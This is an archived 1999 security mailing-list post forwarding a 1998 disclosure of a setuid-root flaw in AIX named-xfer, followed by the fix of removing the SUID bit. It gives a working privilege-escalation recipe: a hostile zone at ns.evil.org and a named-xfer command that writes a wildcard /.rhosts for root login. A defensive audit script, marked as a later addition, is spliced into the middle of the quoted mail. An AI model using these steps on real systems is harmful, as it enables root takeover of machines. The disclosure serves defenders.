Date: Thu, 23 Sep 1999 11:57:32 -0400
From: Kyle Amon <amonk@GNUTEC.COM.>
To: [email protected]
Subject: named-xfer hole on AIX (fwd)
Aleph,
I thought I posted this to the list almost two years ago, but I never saw
it show up and it hasn't turned up in any of the usual archives of such
things. I didn't bother to save a copy so I just figured, oh well. It
turns out a friend that I sent it to saved a copy, so here it is again
(below) for the sake of posterity.
- Kyle
Kyle Amon email: [email protected]
url: http://www.gnutec.com/~amonk
KeyID 1024/26DD13D9
Fingerprint = 7D 86 D1 AE 4B E9 91 6A 4B BC B5 B4 12 F0 D3 1A
A man denied legal counsel, held without bail or trial, is a political
prisoner in any country, especially the United States of America!
http://www.kevinmitnick.com
http://www.2600.com/kevin
Petition to Microsoft Corporation for Open Source Consumer Windows!
http://www.linuxresources.com/linuxreview/petition.html
---------- Forwarded message ----------
Date: Thu, 18 Feb 1999 22:08:12 -0500 (EST)
From: Cherie Earnest <cherie@gnutec.com.>
To: Kyle Amon <amonk@gnutec.com.>
Subject: named-xfer hole on AIX (fwd)
---------- Forwarded message ----------
Date: Thu, 8 Jan 1998 07:58:48 -0500 (EST)
From: [email protected]
To: [email protected]
Subject: named-xfer hole on AIX (fwd)
Friends, Romans, Geeks,
I don't know if anyone's noticed this before, but if so I ain't heard
about it so here goes nuthin... :-)
On AIX, named-xfer has the following permissions...
-r-sr-xr-- 1 root system 32578 Feb 18 1997 /usr/sbin/named-xfer
which of course means that only root and members of the system group have
execute permission but that (since the SUID bit is set) it executes as
root even when run by non-root members of the system group. So, although
one would have to already be a member of the system group (or manage to
obtain such status) in order to exploit the problem described here, it's
still a rather significant problem. And it's much worse than the old
sendmail -C problem which was still exploitable in AIX up until very
recently when one was a member of the system group. The big difference
here being that sendmail -C only let one read files they shouldn't have
been able to read whereas this problem lets one write them :-).
The problem is that named-xfer writes its resulting zone file (when using
the -f option) without (or at least before) relinquishing its root
privilege (and I doubt it ever relinquishes it since it doesn't really
need it in the first place).
So, for example, if one were to set up a zone at ns.evil.org in the
following manner...
putting this in the named.boot file...
primary + db.hack
and giving db.hack contents as follows...
@ IN SOA evil.org. nsa.evil.org. (
666 ; Serial
10800 ; Refresh
3600 ; Retry
3600000 ; Expire
86400 ) ; Minimum TTL
then run a command like this on some victim AIX machine...
named-xfer -z + -f /.rhosts ns.evil.org
they will put this file in root's home directory... :-)
-rw-r--r-- 1 root system 155 Jan 8 03:52 .rhosts
with contents of this... :-)
; zone '+' last serial 0
; from 10.10.10.10 at Thu Jan 8 03:52:19 1998
$ORIGIN .
+ IN SOA evil.org. nsa.evil.org. (
666 10800 3600 3600000 86400 )
All they need do then is create a user like this (anywhere)...
IN:!:666:1::/home/IN:/bin/ksh
and login or su to it then rlogin to victim AIX machine as root! :-)
Isn't that special?
So now we have reason number 9999 not to run the BSD "r" commands on
our machines. And as I'm sure you all know, this is but one semi-creative
use for this. I'm sure the gentle reader will be able to come up with
a handful of others... and the not so gentle reader will immediately see
possibilities for overwriting the /etc/passwd file or the kernel. :-(
Now, lest you think me a true cad, the simple fix is that the damn thing
doesn't need its SUID bit set in order to work (why it comes with it on,
I couldn't imagine). So, check yer boxes boys n girls and dump this here
bit from this here program. :-)
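As an added example (not part of Kyle's mail or of any IBM tooling), the following POSIX shell script does the two things the mail asks an administrator to do: detect the setuid bit on /usr/sbin/named-xfer, and clear it. The mode-string check mirrors the `ls -l` line quoted above ("-r-sr-xr--"); the function names, the `--fix` flag and the use of find(1)'s `-perm -4000` test are this example's own choices, and the named-xfer path is the one the mail reports on AIX 4.1.5/4.2.1.

```shell
#!/bin/sh
# Added example, not from the original post: audit a setuid-root binary and
# drop its SUID bit, the fix the mail recommends for named-xfer.
# Assumptions: POSIX sh, find(1) with -perm, chmod(1); run as root on a real host.

# Return 0 when an ls -l mode string (e.g. "-r-sr-xr--") carries the setuid bit:
# the 4th character is 's' (setuid plus user-exec) or 'S' (setuid without exec).
mode_has_setuid() {
    case "$1" in
        ???[sS]*) return 0 ;;
        *)        return 1 ;;
    esac
}

# Return 0 when the file at $1 has the setuid bit set, using a POSIX find(1) test
# (-perm -4000 matches when at least the setuid bit is present).
file_is_setuid() {
    [ -n "$(find "$1" -prune -perm -4000 2>/dev/null)" ]
}

# Clear the setuid bit on $1. Returns 1 if there was nothing to clear.
drop_setuid() {
    if file_is_setuid "$1"; then
        chmod u-s "$1" && echo "cleared SUID on $1"
    else
        echo "no SUID on $1"
        return 1
    fi
}

# Audit the program named in the mail. Returns 0 when the bit is not set,
# 1 when it is set (the condition the mail describes), 2 when the file is absent.
# The default path is the one quoted in the mail; pass another to audit a copy.
audit_named_xfer() {
    target="${1:-/usr/sbin/named-xfer}"
    if [ ! -e "$target" ]; then
        echo "$target: not present"
        return 2
    fi
    if file_is_setuid "$target"; then
        echo "$target: setuid bit set (runs as root for any system-group member)"
        return 1
    fi
    echo "$target: setuid bit not set"
    return 0
}

# Stand-alone usage:
#   sh audit_named_xfer.sh /usr/sbin/named-xfer          # report only
#   sh audit_named_xfer.sh --fix /usr/sbin/named-xfer    # clear the bit
case "${1:-}" in
    --fix) drop_setuid "${2:-/usr/sbin/named-xfer}" ;;
    "")    echo "usage: $0 [--fix] [path-to-named-xfer]" >&2 ;;
    *)     audit_named_xfer "$1" ;;
esac
```

Running the audit under cron or a configuration-management check keeps the bit from quietly returning after an OS update reinstalls the original file mode.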
Best Regards,
Kyle
P.S. I only verified this on AIX 4.1.5 and 4.2.1 but it is likely a
pervasive problem.
Kyle Amon email: [email protected]
Unix Systems Administrator phone: (203) 486-3290
Security Specialist pager: 1-800-759-8888 PIN 1616512
IBM Global Services or [email protected]
email: [email protected]
url: http://www.gnutec.com/kyle
KeyID 1024/173D96C9
Fingerprint = 90 4F 0B D4 2D 37 E7 61 1A 31 7B F2 72 04 66 1A
Windows 95: A 32-bit patch for a 16-bit GUI shell running on top of an
8-bit operating system written for a 4-bit processor by a
2-bit company who cannot stand 1 bit of competition.